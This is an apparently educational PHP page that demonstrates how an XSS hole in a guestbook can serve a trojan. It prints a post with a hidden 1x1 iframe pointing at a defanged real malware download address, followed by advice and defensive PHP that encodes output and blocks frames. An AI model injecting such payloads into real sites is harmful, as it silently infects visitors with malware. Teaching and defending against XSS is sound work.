malware.php
<?php
require('includes/functions.php');
echo getHeader('Malware Distribution');
?>
<!-- Main jumbotron for a primary marketing message or call to action -->
<div class="jumbotron">
<div class="container">
<h1>Malware Distribution</h1>
<a class="btn btn-primary btn-lg" href="/">
<span class="glyphicon glyphicon-chevron-left"></span>
Back To Home
</a>
</div>
</div>
<div class="container">
<!-- Example row of columns -->
<div class="row">
<div class="col-md-12">
<h2>Distributing a Trojan Horse via an XSS Vulnerability</h2>
<span>This is a continuation of the <a href="/cross-site-scripting" target="_blank">XSS (Cross-Site Scripting) demonstration</a>.</span><br><br>
<span>This demonstration does not specifically require the example guestbook from the XSS demo.</span>
<br><br>
<span>An attacker who discovers an XSS vulnerability in a website can easily inject an invisible <code><?php echo htmlentities("<iframe>"); ?></code> anywhere on the page, which will load anything that the attacker specifies.</span>
<span>Remotely hosting malware, in this case a <a href="https://www.owasp.org/index.php/Trojan_Horse" target="_blank">Trojan Horse</a>, is a very easy way to infect the machines of unsuspecting visitors to that website.</span>
<br><br>
<span>For this demo, we're going to use <a href="http://support.clean-mx.com/clean-mx/viruses.php" target="_blank">Clean-MX</a> to find a Trojan's remote URL and create a malicious <code><?php echo htmlentities("<iframe>"); ?></code>.</span>
<br><br>
<h4>The Trojan Horse - <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor:Win32/Zegost.AD#tab=2" target="_blank">Backdoor.Win32.Zegost</a></h4>
<pre>
<code class="html">
hxxp://87[dot]duote[dot]com[dot]cn/ett[dot]exe
</code>
</pre>
<span><small>Source: <a target="_blank" href="http://support.clean-mx.com/clean-mx/viruses.php">Clean-MX Support</a></small></span>
<br>
<br>
<span>After identifying the vulnerable input on the target website, in this case the message box on our <a href="/cross-site-scripting/example" target="_blank">example page</a>, we're going to create a malicious post.</span>
<br><br>
<h4>The Guestbook Message</h4>
<pre>
<code class="text">
<?php echo htmlentities('
<iframe src="hxxp://87[dot]duote[dot]com[dot]cn/ett[dot]exe" width="1" height="1" style="visibility:hidden"></iframe>
Such a beautiful guestbook you have here, it would be a shame if someone defaced it! <3
'); ?>
</code>
</pre>
<span>Like what you see? Go ahead and post it in the vulnerable guestbook app! Below is a screenshot of the attack taking place. Visitors to the webpage will not see the invisible iframe inside the post, but each of them will be served a file download immediately.</span>
<hr>
<img src="content/malware-distribution/example.png" alt="Notice the automatic download of the Trojan's exe file">
<hr>
<br><br>
<h4>How To Protect Yourself</h4>
<span>For unsuspecting visitors: if you see something like this, be smart and do not accept any file download that starts automatically. For developers, see the <a href="/cross-site-scripting" target="_blank">solution section in my Cross-Site Scripting demonstration</a>.</span>
</div>
</div>
<?php
echo getFooter();
?>
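
For the developer side of "How To Protect Yourself", here is an added example (not code from this repository) of rendering guestbook posts so that an injected iframe is displayed as text, with a response header as a second layer and a scan for posts already stored. The function names `renderGuestbookMessage` and `findEmbeddedFrames`, the sample rows and the `example.invalid` URL are assumptions made for illustration.

```php
<?php
// Added example, not part of this repository. Names and sample data are constructed.

/** Render a stored guestbook message as inert text (encode on output). */
function renderGuestbookMessage(string $message): string
{
    // Markup in the post is turned into entities, so the browser shows it instead of parsing it.
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return nl2br($safe, false);
}

/** Return the ids of stored messages that carry frame or embed markup, for clean-up review. */
function findEmbeddedFrames(array $messages): array
{
    $hits = [];
    foreach ($messages as $id => $message) {
        if (preg_match('/<\s*(iframe|frame|object|embed)\b/i', $message)) {
            $hits[] = $id;
        }
    }
    return $hits;
}

// Constructed sample rows; the iframe source is a placeholder host.
$stored = [
    1 => "Lovely site!",
    2 => '<iframe src="https://example.invalid/file" width="1" height="1" style="visibility:hidden"></iframe>'
        . "\nSuch a beautiful guestbook <3",
];

// Defence in depth: if an encoding call is ever missed, the browser still refuses to load frames.
if (PHP_SAPI !== 'cli' && !headers_sent()) {
    header("Content-Security-Policy: default-src 'self'; frame-src 'none'; object-src 'none'");
}

foreach ($stored as $id => $message) {
    echo '<p class="message">', renderGuestbookMessage($message), "</p>\n";
}

// Message 2 is listed here; it renders above as visible text, not as a frame.
echo '<!-- messages to review: ', implode(',', findEmbeddedFrames($stored)), " -->\n";
```

The scan only finds posts that need clean-up; the protection itself is the output encoding, which also neutralises markup the pattern does not list.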